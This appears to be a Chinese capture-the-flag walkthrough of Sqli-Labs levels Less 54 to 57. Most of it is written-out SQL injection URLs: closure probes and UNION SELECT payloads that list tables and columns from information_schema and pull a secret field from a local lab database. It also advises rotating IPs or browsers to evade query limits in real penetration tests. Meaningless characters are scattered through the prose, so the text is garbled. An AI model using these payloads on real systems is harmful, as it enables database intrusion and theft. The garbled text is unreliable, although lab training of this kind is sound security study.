Less 54

基于錯誤_GET_單引號_字符型_UNION注入

從 Less 54 - Less 65 這 12 關(guān)屬于 Page 4：Challenges哩陕，這些是一些綜合的注入訓練苏遥，限制了查詢的次數(shù)，更貼近于 GET 的實戰(zhàn)痴晦。這也是整個 Sqli-Labs 的最后一部分。

現(xiàn)在我們將綜合運用之前所學的各種注入技巧摔认，拿到 flag顽照。

http://localhost:8088/sqlilabs/Less-54/?id=1'
http://localhost:8088/sqlilabs/Less-54/?id=1"

雙引號正常，單引號無報錯回顯辽装，為字符型單引號閉合帮碰。

http://localhost:8088/sqlilabs/Less-54/?id=1'--+

正確回顯，未過濾注釋拾积。

http://localhost:8088/sqlilabs/Less-54/?id=0' union select 1,2,3--+

既然有回顯殉挽，在相應位置使用union注入即可。

http://localhost:8088/sqlilabs/Less-54/?id=0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+

由主界面的提示已知數(shù)據(jù)庫名是challenges拓巧，注入表名和數(shù)據(jù)即可斯碌。
這隨機生成的表名真別致。

http://localhost:8088/sqlilabs/Less-54/?id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='mgf71onn75'--+

那個secret加上奇奇怪怪字符的字段應該就是我們想要的肛度。

http://localhost:8088/sqlilabs/Less-54/?id=0' union select 1,2,group_concat(secret_2CU7) from challenges.mgf71onn75--+

在下面的輸入框中輸入 flag 即可傻唾，出現(xiàn)祝賀的圖片：

在實際滲透測試當中，我們可以利用更換 ip（使用代理）或更換瀏覽器等承耿，看服務器端檢測什么內(nèi)容進行限制冠骄。

Less 55

基于錯誤_GET_小括號_數(shù)字型_UNION注入

http://localhost:8088/sqlilabs/Less-55/?id=1'
http://localhost:8088/sqlilabs/Less-55/?id=1"
http://localhost:8088/sqlilabs/Less-55/?id=1')--+
http://localhost:8088/sqlilabs/Less-55/?id=1")--+
http://localhost:8088/sqlilabs/Less-55/?id=1)--+

單雙引號都無報錯回顯，加了小括號還是沒出現(xiàn)瘩绒，一度懷疑人生猴抹，然后發(fā)現(xiàn)忘了一種小括號閉合數(shù)字型…為數(shù)字型小括號閉合。
未過濾注釋锁荔，有正確回顯蟀给，使用union注入蝙砌。
剩下的同 Less 54。

Less 56

基于錯誤_GET_小括號_單引號_字符型_UNION注入

http://localhost:8088/sqlilabs/Less-56/?id=1'--+
http://localhost:8088/sqlilabs/Less-56/?id=1"--+
http://localhost:8088/sqlilabs/Less-56/?id=1')--+

單引號無報錯回顯跋理，雙引號和單引號加小括號有正確回顯择克，為字符型單引號加小括號閉合。
未過濾注釋前普，使用union注入肚邢。
剩下的還是同 Less 54。

Less 57

基于錯誤_GET_雙引號_字符型_UNION注入

http://localhost:8088/sqlilabs/Less-57/?id=1'
http://localhost:8088/sqlilabs/Less-57/?id=1"
http://localhost:8088/sqlilabs/Less-57/?id=1")--+
http://localhost:8088/sqlilabs/Less-57/?id=1"--+

雙引號和雙引號加小括號無報錯回顯拭卿，單引號有正確回顯骡湖，為字符型雙引號閉合。
未過濾注釋峻厚，使用union注入响蕴。
剩下的仍同 Less 54，也不知道設這么多重復關(guān)卡有啥子用…練習判斷閉合么…